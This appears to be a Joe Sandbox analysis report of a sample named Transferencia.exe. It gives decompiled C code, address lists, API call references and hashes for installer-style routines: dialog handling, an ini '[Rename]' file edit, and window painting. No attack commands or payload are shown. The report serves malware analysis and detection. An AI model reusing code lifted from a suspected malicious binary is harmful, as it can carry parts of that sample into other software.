                                                0x004053b7
                                                0x004053bc
                                                0x004053c3
                                                0x004053c6
                                                0x00405468
                                                0x00405471
                                                0x00405479
                                                0x00405479
                                                0x00405487
                                                0x00405498
                                                0x00405498
                                                0x00000000
                                                0x00405487
                                                0x004053cc
                                                0x004053cf
                                                0x004053d5
                                                0x004053da
                                                0x004053dc
                                                0x004053de
                                                0x004053e4
                                                0x004053eb
                                                0x004053f0
                                                0x004053f7
                                                0x004053fa
                                                0x004053fa
                                                0x00405401
                                                0x0040540d
                                                0x00405411
                                                0x00405413
                                                0x00405413
                                                0x00405403
                                                0x00405405
                                                0x00405405
                                                0x00405433
                                                0x0040543f
                                                0x0040544e
                                                0x0040544e
                                                0x00405450
                                                0x00405453
                                                0x0040545c
                                                0x00000000
                                                0x00405363
                                                0x0040536e
                                                0x00405371
                                                0x00405376
                                                0x00405378
                                                0x0040537c
                                                0x0040538c
                                                0x00405396
                                                0x00405398
                                                0x0040539b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040537e
                                                0x0040537e
                                                0x00405384
                                                0x00405386
                                                0x00405386
                                                0x00405387
                                                0x00405388
                                                0x00000000
                                                0x0040537e
                                                0x00405361
                                                0x0040533c
                                                0x0040527f
                                                0x00000000
                                                0x00405295
                                                0x0040529f
                                                0x004052a4
                                                0x00000000
                                                0x00000000
                                                0x004052b6
                                                0x004052bb
                                                0x004052c7
                                                0x004052c7
                                                0x004052c9
                                                0x004052d8
                                                0x004052da
                                                0x004052de
                                                0x004052e1
                                                0x00000000
                                                0x004052e1
                                                0x0040527f
                                                0x00404f35
                                                0x00404f3a
                                                0x00404f43
                                                0x00404f4a
                                                0x00404f5c
                                                0x00404f67
                                                0x00404f6d
                                                0x00404f7b
                                                0x00404f8f
                                                0x00404f94
                                                0x00404fa1
                                                0x00404fa6
                                                0x00404fbc
                                                0x00404fcd
                                                0x00404fda
                                                0x00404fda
                                                0x00404fdd
                                                0x00404fe3
                                                0x00404fe5
                                                0x00404fe8
                                                0x00404fed
                                                0x00404ff2
                                                0x00404ff4
                                                0x00404ff4
                                                0x00405014
                                                0x00405014
                                                0x00405016
                                                0x00405017
                                                0x0040501c
                                                0x00405022
                                                0x00405026
                                                0x0040502b
                                                0x00405033
                                                0x00405037
                                                0x0040503c
                                                0x00405041
                                                0x00405049
                                                0x0040504c
                                                0x0040511c
                                                0x0040512f
                                                0x00000000
                                                0x00405052
                                                0x00405055
                                                0x00405058
                                                0x0040505b
                                                0x0040505b
                                                0x00405061
                                                0x0040506a
                                                0x0040506d
                                                0x00405071
                                                0x00405074
                                                0x00405077
                                                0x00405080
                                                0x00405089
                                                0x0040508c
                                                0x0040508f
                                                0x00405092
                                                0x004050d0
                                                0x004050fb
                                                0x004050d2
                                                0x004050e1
                                                0x004050e1
                                                0x00405094
                                                0x00405097
                                                0x004050a5
                                                0x004050af
                                                0x004050b7
                                                0x004050be
                                                0x004050c9
                                                0x004050c9
                                                0x00405092
                                                0x00405101
                                                0x00405102
                                                0x0040510e
                                                0x0040510e
                                                0x0040511a
                                                0x00405135
                                                0x00405138
                                                0x00405155
                                                0x00000000
                                                0x0040513a
                                                0x0040513f
                                                0x00405148
                                                0x004054db
                                                0x004054ed
                                                0x004054ed
                                                0x00405138
                                                0x00000000
                                                0x0040511a
                                                0x0040504c

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404EFB
                                                • GetDlgItem.USER32 ref: 00404F06
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
                                                • LoadImageW.USER32 ref: 00404F67
                                                • SetWindowLongW.USER32(?,000000FC,004054F0), ref: 00404F80
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
                                                • DeleteObject.GDI32(00000000), ref: 00404FDD
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF
                                                  • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405121
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040512F
                                                • ShowWindow.USER32(?,00000005), ref: 0040513F
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
                                                • ImageList_Destroy.COMCTL32(?), ref: 0040530D
                                                • GlobalFree.KERNEL32 ref: 0040531D
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
                                                • ShowWindow.USER32(?,00000000), ref: 004054C7
                                                • GetDlgItem.USER32 ref: 004054D2
                                                • ShowWindow.USER32(00000000), ref: 004054D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 175cf0479e418895b067fb807809c06ca34509b835de2015ac728b6654376382
                                                • Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
                                                • Opcode Fuzzy Hash: 175cf0479e418895b067fb807809c06ca34509b835de2015ac728b6654376382
                                                • Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00404635(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t56;
                                                				intOrPtr _t69;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t108;
                                                				signed int _t110;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					__eflags = _a8 - 0x111;
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						__eflags = _a8 - 0x4e;
                                                						if(_a8 != 0x4e) {
                                                							__eflags = _a8 - 0x40b;
                                                							if(_a8 == 0x40b) {
                                                								 *0x79ff14 =  *0x79ff14 + 1;
                                                								__eflags =  *0x79ff14;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E004044DD(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                                                							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                                                							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                								_v12 = _t103;
                                                								__eflags = _t103 - _t113 - 0x800;
                                                								_v16 = _t113;
                                                								_v8 = 0x7a6a00;
                                                								if(_t103 - _t113 < 0x800) {
                                                									SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                									SetCursor(LoadCursorW(0, 0x7f02));
                                                									_push(1);
                                                									E004048E4(_a4, _v8);
                                                									SetCursor(LoadCursorW(0, 0x7f00));
                                                									_t114 = _a16;
                                                								}
                                                							}
                                                						}
                                                						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                                                							goto L28;
                                                						} else {
                                                							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                                                							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                								goto L28;
                                                							}
                                                							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x7a8a68, 0x111, 1, 0);
                                                							}
                                                							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x7a8a68, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					__eflags = _a12 >> 0x10;
                                                					if(_a12 >> 0x10 != 0) {
                                                						goto L27;
                                                					}
                                                					__eflags =  *0x79ff14; // 0x0
                                                					if(__eflags != 0) {
                                                						goto L27;
                                                					}
                                                					_t69 =  *0x7a0f20; // 0x9a9554
                                                					_t29 = _t69 + 0x14; // 0x9a9568
                                                					_t116 = _t29;
                                                					__eflags =  *_t116 & 0x00000020;
                                                					if(( *_t116 & 0x00000020) == 0) {
                                                						goto L27;
                                                					}
                                                					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                					__eflags = _t108;
                                                					 *_t116 = _t108;
                                                					E00404498(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                					E004048C0();
                                                					goto L13;
                                                				} else {
                                                					_t117 = _a16;
                                                					_t75 =  *(_t117 + 0x30);
                                                					if(_t75 < 0) {
                                                						_t75 =  *( *0x7a7a3c - 4 + _t75 * 4);
                                                					}
                                                					_t76 =  *0x7a8a98 + _t75 * 2;
                                                					_t110 =  *_t76 & 0x0000ffff;
                                                					_a8 = _t110;
                                                					_t78 =  &(_t76[1]);
                                                					_a16 = _t78;
                                                					_v16 = _t78;
                                                					_v12 = 0;
                                                					_v8 = E004045E6;
                                                					if(_t110 != 2) {
                                                						_v8 = E004045AC;
                                                					}
                                                					_push( *((intOrPtr*)(_t117 + 0x34)));
                                                					_push(0x22);
                                                					E00404476(_a4);
                                                					_push( *((intOrPtr*)(_t117 + 0x38)));
                                                					_push(0x23);
                                                					E00404476(_a4);
                                                					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                					E00404498( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                					_t118 = GetDlgItem(_a4, 0x3e8);
                                                					E004044AB(_t118);
                                                					SendMessageW(_t118, 0x45b, 1, 0);
                                                					_t92 =  *( *0x7a8a70 + 0x68);
                                                					if(_t92 < 0) {
                                                						_t92 = GetSysColor( ~_t92);
                                                					}
                                                					SendMessageW(_t118, 0x443, 0, _t92);
                                                					SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                					 *0x79ff14 = 0;
                                                					SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                					 *0x79ff14 = 0;
                                                					return 0;
                                                				}
                                                			}




















                                                0x00404647
                                                0x00404767
                                                0x00404774
                                                0x004047d1
                                                0x004047d1
                                                0x004047d5
                                                0x0040489b
                                                0x004048a2
                                                0x004048a4
                                                0x004048a4
                                                0x004048a4
                                                0x004048aa
                                                0x004048aa
                                                0x004048ad
                                                0x00000000
                                                0x004048b4
                                                0x004047e3
                                                0x004047e9
                                                0x004047ec
                                                0x004047f3
                                                0x004047f5
                                                0x004047fc
                                                0x004047fe
                                                0x00404801
                                                0x00404804
                                                0x00404809
                                                0x0040480f
                                                0x00404812
                                                0x00404819
                                                0x00404826
                                                0x00404837
                                                0x0040483d
                                                0x00404845
                                                0x00404853
                                                0x00404859
                                                0x00404859
                                                0x00404819
                                                0x004047fc
                                                0x0040485c
                                                0x00404863
                                                0x00000000
                                                0x00404865
                                                0x00404865
                                                0x0040486c
                                                0x00000000
                                                0x00000000
                                                0x0040486e
                                                0x00404872
                                                0x00404882
                                                0x00404882
                                                0x00404884
                                                0x00404888
                                                0x00404894
                                                0x00404894
                                                0x00000000
                                                0x00404898
                                                0x00404863
                                                0x0040477c
                                                0x0040477f
                                                0x00000000
                                                0x00000000
                                                0x00404785
                                                0x0040478b
                                                0x00000000
                                                0x00000000
                                                0x00404791
                                                0x00404796
                                                0x00404796
                                                0x00404799
                                                0x0040479c
                                                0x00000000
                                                0x00000000
                                                0x004047c3
                                                0x004047c3
                                                0x004047c5
                                                0x004047c7
                                                0x004047cc
                                                0x00000000
                                                0x0040464d
                                                0x0040464d
                                                0x00404650
                                                0x00404655
                                                0x00404666
                                                0x00404666
                                                0x0040466e
                                                0x00404671
                                                0x00404675
                                                0x00404678
                                                0x0040467c
                                                0x0040467f
                                                0x00404682
                                                0x00404685
                                                0x0040468c
                                                0x0040468e
                                                0x0040468e
                                                0x00404698
                                                0x004046a5
                                                0x004046af
                                                0x004046b4
                                                0x004046b7
                                                0x004046bc
                                                0x004046d3
                                                0x004046da
                                                0x004046ed
                                                0x004046f0
                                                0x00404704
                                                0x0040470b
                                                0x00404710
                                                0x00404715
                                                0x00404715
                                                0x00404723
                                                0x00404731
                                                0x00404743
                                                0x00404748
                                                0x00404758
                                                0x0040475a
                                                0x00000000
                                                0x00404760

                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
                                                • GetDlgItem.USER32 ref: 004046E7
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
                                                • GetSysColor.USER32(?), ref: 00404715
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
                                                • lstrlenW.KERNEL32(?), ref: 00404736
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
                                                • GetDlgItem.USER32 ref: 004047B1
                                                • SendMessageW.USER32(00000000), ref: 004047B8
                                                • GetDlgItem.USER32 ref: 004047E3
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404834
                                                • SetCursor.USER32(00000000), ref: 00404837
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404850
                                                • SetCursor.USER32(00000000), ref: 00404853
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                                                • Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
                                                • Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                                                • Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406160(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t12;
                                                				long _t24;
                                                				char* _t31;
                                                				int _t37;
                                                				void* _t38;
                                                				intOrPtr* _t39;
                                                				long _t42;
                                                				WCHAR* _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t52;
                                                				void* _t53;
                                                
                                                				_t38 = __ecx;
                                                				_t44 =  *(_t52 + 0x14);
                                                				 *0x7a55e8 = 0x55004e;
                                                				 *0x7a55ec = 0x4c;
                                                				if(_t44 == 0) {
                                                					L3:
                                                					_t2 = _t52 + 0x1c; // 0x7a5de8
                                                					_t12 = GetShortPathNameW( *_t2, 0x7a5de8, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						_t37 = wsprintfA(0x7a51e8, "%ls=%ls\r\n", 0x7a55e8, 0x7a5de8);
                                                						_t53 = _t52 + 0x10;
                                                						E00406557(_t37, 0x400, 0x7a5de8, 0x7a5de8,  *((intOrPtr*)( *0x7a8a70 + 0x128)));
                                                						_t12 = E0040600A(0x7a5de8, 0xc0000000, 4);
                                                						_t48 = _t12;
                                                						 *(_t53 + 0x18) = _t48;
                                                						if(_t48 != 0xffffffff) {
                                                							_t42 = GetFileSize(_t48, 0);
                                                							_t6 = _t37 + 0xa; // 0xa
                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                							if(_t46 == 0 || E0040608D(_t48, _t46, _t42) == 0) {
                                                								L18:
                                                								return CloseHandle(_t48);
                                                							} else {
                                                								if(E00405F6F(_t38, _t46, "[Rename]\r\n") != 0) {
                                                									_t49 = E00405F6F(_t38, _t21 + 0xa, "\n[");
                                                									if(_t49 == 0) {
                                                										_t48 =  *(_t53 + 0x18);
                                                										L16:
                                                										_t24 = _t42;
                                                										L17:
                                                										E00405FC5(_t24 + _t46, 0x7a51e8, _t37);
                                                										SetFilePointer(_t48, 0, 0, 0);
                                                										E004060BC(_t48, _t46, _t42 + _t37);
                                                										GlobalFree(_t46);
                                                										goto L18;
                                                									}
                                                									_t39 = _t46 + _t42;
                                                									_t31 = _t39 + _t37;
                                                									while(_t39 > _t49) {
                                                										 *_t31 =  *_t39;
                                                										_t31 = _t31 - 1;
                                                										_t39 = _t39 - 1;
                                                									}
                                                									_t24 = _t49 - _t46 + 1;
                                                									_t48 =  *(_t53 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                								_t42 = _t42 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E0040600A(_t44, 0, 1));
                                                					_t12 = GetShortPathNameW(_t44, 0x7a55e8, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t12;
                                                			}



















                                                0x00406160
                                                0x00406169
                                                0x00406170
                                                0x0040617a
                                                0x0040618e
                                                0x004061b6
                                                0x004061bd
                                                0x004061c1
                                                0x004061c5
                                                0x004061e5
                                                0x004061ec
                                                0x004061f6
                                                0x00406203
                                                0x00406208
                                                0x0040620d
                                                0x00406211
                                                0x00406220
                                                0x00406222
                                                0x0040622f
                                                0x00406233
                                                0x004062ce
                                                0x00000000
                                                0x00406249
                                                0x00406256
                                                0x0040627a
                                                0x0040627e
                                                0x0040629d
                                                0x004062a1
                                                0x004062a1
                                                0x004062a3
                                                0x004062ac
                                                0x004062b7
                                                0x004062c2
                                                0x004062c8
                                                0x00000000
                                                0x004062c8
                                                0x00406280
                                                0x00406283
                                                0x0040628e
                                                0x0040628a
                                                0x0040628c
                                                0x0040628d
                                                0x0040628d
                                                0x00406295
                                                0x00406297
                                                0x00000000
                                                0x00406297
                                                0x00406261
                                                0x00406267
                                                0x00000000
                                                0x00406267
                                                0x00406233
                                                0x00406211
                                                0x00406190
                                                0x0040619b
                                                0x004061a4
                                                0x004061a8
                                                0x00000000
                                                0x00000000
                                                0x004061a8
                                                0x004062d9

                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
                                                • GetShortPathNameW.KERNEL32 ref: 004061A4
                                                  • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                                                  • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                                                • GetShortPathNameW.KERNEL32 ref: 004061C1
                                                • wsprintfA.USER32 ref: 004061DF
                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                                                • GlobalFree.KERNEL32 ref: 004062C8
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062CF
                                                  • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Transferencia.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                  • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                                • API String ID: 2171350718-2304911260
                                                • Opcode ID: 0fc318522e14f799396e5140a163aeba190b6da409f6537590e24aabf338351a
                                                • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                                                • Opcode Fuzzy Hash: 0fc318522e14f799396e5140a163aeba190b6da409f6537590e24aabf338351a
                                                • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x7a8a70;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, 0x7a7a60, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a68;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
